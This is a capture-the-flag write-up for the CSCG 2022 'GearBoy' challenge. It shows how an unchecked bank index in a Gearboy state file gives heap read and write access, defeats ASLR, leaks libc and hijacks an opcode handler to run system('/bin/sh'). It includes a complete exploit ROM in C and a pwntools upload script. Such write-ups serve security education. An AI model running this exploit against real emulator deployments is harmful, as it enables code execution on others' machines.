CSCG 2022 - GearBoy

Last modification on 2023-05-31

Challenge

Straightforward task: exploit the Gearboy emulator.

Overview

The task is to read the contents of the flag file by crafting a Gearboy ROM and state file. Both are run on the target server by a modified, headless version of Gearboy, a Game Boy emulator.

Analysis

My immediate suspicion was that checks were missing for the state file rather than the ROM. The state can be saved and loaded at any point in time, while the ROM only needs to be checked on initial load. The state file therefore needs more checks, and each of them could be broken or forgotten entirely.

Inspecting the source code of GearboyCore::LoadState, we find that the emulator's functionality is split into many classes, each with its own LoadState, e.g. Processor::LoadState and Memory::LoadState.

Memory::LoadState loads (among other things) the various memory bank buffers as well as the values that control which banks are selected. Since the address space of the Game Boy was limited (16-bit), parts of memory had to be swapped in and out to give access to more space, hence the concept of memory bank switching. Often an index indicates which memory bank is in use, as is the case with WRAM1:

u8* Memory::GetWRAM1()
{
    return m_bCGB ? m_pWRAMBanks + (0x1000 * m_iCurrentWRAMBank) : m_pMap + 0xD000;
}

As long as m_bCGB (a flag for Game Boy Color mode) is set, the backing buffer of WRAM1 is chosen from a bank in m_pWRAMBanks. The value of m_bCGB is determined by special-purpose bytes in the ROM, which we control.

Since m_iCurrentWRAMBank is loaded as part of the state and its value is not properly sanitized, modifying this value in the state file allows us to essentially mmap an arbitrary piece of memory into the address space of our emulated game. When the running ROM reads from or writes to 0xD000-0xE000, it accesses the address we chose instead.
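To make the effect of an unchecked bank index concrete, here is a minimal Python model of the pointer arithmetic in GetWRAM1. The function names are hypothetical and offsets are expressed relative to m_pWRAMBanks; it only mirrors the expression shown above and is not Gearboy code.

```python
BANK_SIZE = 0x1000  # size of one switchable WRAM bank, as in GetWRAM1()


def wram1_host_offset(current_bank):
    """Offset of the WRAM1 backing buffer relative to m_pWRAMBanks."""
    return BANK_SIZE * current_bank


def host_offset_for(gb_addr, current_bank):
    """Offset (relative to m_pWRAMBanks) hit by a guest access to gb_addr."""
    if not 0xD000 <= gb_addr < 0xE000:
        raise ValueError("address is outside the WRAM1 window")
    return wram1_host_offset(current_bank) + (gb_addr - 0xD000)


# A sane bank index stays inside the buffer...
print(hex(host_offset_for(0xD000, 1)))
# ...while a negative one lands in front of it, in unrelated heap data.
print(hex(host_offset_for(0xD000, -0x13)))
```

Because the index is a signed integer, negative values reach memory allocated before the bank buffer, which is what the rest of the exploit relies on.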

But where to write when ASLR is enabled?

To get around ASLR we need to find objects on the heap at consistent offsets from the WRAM bank buffer m_pWRAMBanks. We can do this by running gdbserver in the Docker container and observing the surrounding memory and the pointers of objects allocated shortly before or after it. The fact that each session is a freshly spawned Docker container helps with consistency.

Doing this, we find a heap layout that is consistent on every first run in the Docker container: the Processor object is at an offset of -0x126a0 from m_pWRAMBanks, and the Memory object is at an offset of -0xd0 from the Processor object (-0x12770 from m_pWRAMBanks). Setting m_iCurrentWRAMBank to -0x13 in the state file moves the WRAM1 window to m_pWRAMBanks-0x13000, so the Processor object becomes accessible at 0x13000-0x126a0+0xD000=0xD960 and the Memory object at 0x13000-0x12770+0xD000=0xD890.
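The bank index and the guest addresses follow directly from the heap offsets. The sketch below redoes that arithmetic in Python; window_for is a hypothetical helper, and the two offsets are the ones observed in gdb above.

```python
BANK_SIZE = 0x1000
WRAM1_BASE = 0xD000


def window_for(offset_from_wram):
    """Return (bank index, guest address) that reaches m_pWRAMBanks + offset."""
    # divmod floors towards negative infinity, so `within` is always 0..0xFFF.
    bank, within = divmod(offset_from_wram, BANK_SIZE)
    return bank, WRAM1_BASE + within


PROCESSOR_OFFSET = -0x126a0              # Processor relative to m_pWRAMBanks
MEMORY_OFFSET = PROCESSOR_OFFSET - 0xd0  # Memory sits 0xd0 bytes before Processor

print([hex(v) for v in window_for(PROCESSOR_OFFSET)])
print([hex(v) for v in window_for(MEMORY_OFFSET)])
```

Both objects fall into the same 0x1000-byte window, so a single bank value of -0x13 exposes them at the same time.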

For every instruction, the processor resolves the function for handling an opcode by looking it up in a table using the opcode as an index. This opcodeTable is a member of the Processor object and as such stored on the heap. By reading one of these function pointers and subtracting its offset in the binary we can recover the base address at which the gearboy emulator is loaded.
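As a sketch of this step, the snippet below decodes a leaked table entry and derives the load address. The offset 0x1d420 is the one used in rom.c for the opcode 0x00 handler; the leaked value is a made-up example, and the assumption that the first 8 bytes of an entry hold the plain function address is mine.

```python
import struct

NOP_HANDLER_OFFSET = 0x1d420  # offset of the opcode 0x00 handler (from rom.c)


def image_base(first_table_bytes):
    """Recover the load address from the first 8 bytes of the opcode table."""
    (handler,) = struct.unpack("<Q", first_table_bytes[:8])
    base = handler - NOP_HANDLER_OFFSET
    if base & 0xFFF:
        # A load address is page aligned; anything else means wrong offsets.
        raise ValueError("base is not page aligned; offsets do not match this build")
    return base


# Hypothetical leak, as the ROM would read it byte by byte from 0xD960.
leak = struct.pack("<Q", 0x555555554000 + NOP_HANDLER_OFFSET)
print(hex(image_base(leak)))
```

The page-alignment check is a cheap sanity test: if the binary on the server differs from the local build, the subtraction is unlikely to yield an aligned address.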

Now that we know the base address, and with it the address of the GOT, the natural next step would normally be to leak libc by reading the GOT, calculate the address of system, and overwrite a function pointer so that it calls system. The only problem is that we are still just a ROM in an emulator and only have access to the memory mapped into 0xD000-0xE000.

We need to look for another access primitive.

This time, however, we are not limited to the contents of our state and ROM files. We can manipulate the Memory and Processor objects directly!

Looking through the source code again we find a good candidate:

u8* Memory::GetVRAM()
{
    if (m_bCGB)
        return (m_iCurrentLCDRAMBank == 1) ? m_pLCDRAMBank1 : m_pMap + 0x8000;
    else
        return m_pMap + 0x8000;
}

We have already set m_bCGB, and m_iCurrentLCDRAMBank is loaded from the state file. As such, we can make accesses to 0x8000-0x9000 be backed by the m_pLCDRAMBank1 buffer, whose pointer we now control through the WRAM1 window.

We set m_pLCDRAMBank1 in the Memory object to point to the GOT entry of free, whose address is calculated from the base address. We can then read the address of free from 0x8000, derive the libc base from it, and calculate the address of system.
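The address arithmetic of this step can be sketched as follows. The three offsets are the ones hard-coded in rom.c and are specific to the binaries in the challenge container; the function names and the sample addresses are hypothetical.

```python
FREE_GOT_OFFSET = 0x4ad78    # GOT slot of free, relative to the emulator base
FREE_LIBC_OFFSET = 0x9a6d0   # free, relative to the libc base
SYSTEM_LIBC_OFFSET = 0x52290 # system, relative to the libc base


def free_got_address(emulator_base):
    """Value to store in m_pLCDRAMBank1 so that 0x8000 shows the GOT slot."""
    return emulator_base + FREE_GOT_OFFSET


def system_address(leaked_free):
    """Derive the address of system from the leaked address of free."""
    libc_base = leaked_free - FREE_LIBC_OFFSET
    if libc_base & 0xFFF:
        raise ValueError("libc base is not page aligned; wrong libc version?")
    return libc_base + SYSTEM_LIBC_OFFSET


# Made-up example values standing in for the real leaks.
print(hex(free_got_address(0x555555554000)))
print(hex(system_address(0x7ffff7dc0000 + FREE_LIBC_OFFSET)))
```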

To finally call system, we overwrite a function pointer in Processor::opcodeTable and execute the corresponding opcode. The handlers are called on the Processor object, so rdi holds its address when system is called; we therefore write the string /bin/sh to the start of the Processor object to make it the first argument. Since opcodeTable is the first member of Processor, the opcode we hijack must not overlap the space used for the string, and it must not be executed before the pointer has been fully written (as would be the case with the load instructions). The stop instruction (opcode 0x10) is a good fit here.
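The layout constraint can be checked with a few lines of Python. The entry size of 0x10 bytes is inferred from the 0x10*0x10 write in rom.c; the helper names are hypothetical.

```python
ENTRY_SIZE = 0x10  # bytes per table entry, matching the 0x10*0x10 write in rom.c


def entry_offset(opcode):
    """Offset of an opcode's table entry from the start of the Processor object."""
    return opcode * ENTRY_SIZE


def clobbered_opcodes(payload):
    """Opcodes whose table entries overlap a payload written at offset 0."""
    return {i // ENTRY_SIZE for i in range(len(payload))}


command = b"/bin/sh\x00"  # what strcpy writes, including the terminator
STOP = 0x10

print(sorted(clobbered_opcodes(command)), hex(entry_offset(STOP)))
```

Under this model the string only touches the entry of opcode 0x00, so the ROM should avoid executing that opcode once the string is in place, while the entry for stop at offset 0x100 stays free for the system pointer.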

Exploit

The ROM code was compiled using GBDK.

rom.c

#include <stdint.h>
#include <string.h>

void
main(void)
{
    volatile static uint8_t *processor_gb;
    volatile static uint8_t *memory_gb;
    volatile static uint8_t *free_got_gb;
    volatile static uint64_t op0x00;
    volatile static uint64_t base;
    volatile static uint64_t libc;
    volatile static uint64_t free_got;
    volatile static uint64_t target;

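    /* The state file sets the WRAM bank to -0x13, so 0xD000-0xE000 maps
       the heap region that holds the Processor and Memory objects. */
    processor_gb = (void*) 0xD960;
    memory_gb = processor_gb - 0xd0;

    /* Leak the opcode 0x00 handler and subtract its offset to get the base. */
    op0x00 = *(uint64_t*)processor_gb;
    base = op0x00 - 0x1d420;
    free_got = base + 0x4ad78;

    /* Point m_pLCDRAMBank1 (Memory + 0x90) at the GOT entry of free,
       which then becomes readable at 0x8000. */
    *(uint64_t*)(memory_gb+0x90) = free_got;
    free_got_gb = (void*) 0x8000;

    /* Leak free and subtract its offset to get the libc base. */
    libc = (*(uint64_t*)free_got_gb) - 0x9a6d0;

    /* Address of system. "/bin/sh" goes to the start of Processor (rdi),
       and the table entry of stop (opcode 0x10, 0x10 bytes per entry)
       is replaced with system. */
    target = libc + 0x52290;
    strcpy((char*)processor_gb, "/bin/sh");
    *(uint64_t*)(processor_gb+0x10*0x10) = target;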

    __asm \
        stop \
    __endasm;

    while (1);
}

upload.py

import struct
from base64 import b64encode
from sys import argv
from pwn import *

# bytearray keeps the file contents mutable for patching
with open("main.gb", "rb") as f:
    rom = bytearray(f.read())
with open("main.state", "rb") as f:
    state = bytearray(f.read())

# set m_iCurrentWRAMBank (little-endian signed 32-bit)
state[0x10000:0x10004] = struct.pack("<i", -0x13)

# set m_iCurrentLCDRAMBank
state[0x10004:0x10008] = struct.pack("<i", 1)

io = process(argv[1:])

io.sendline(b64encode(bytes(rom)))
io.sendline(b64encode(bytes(state)))

io.interactive()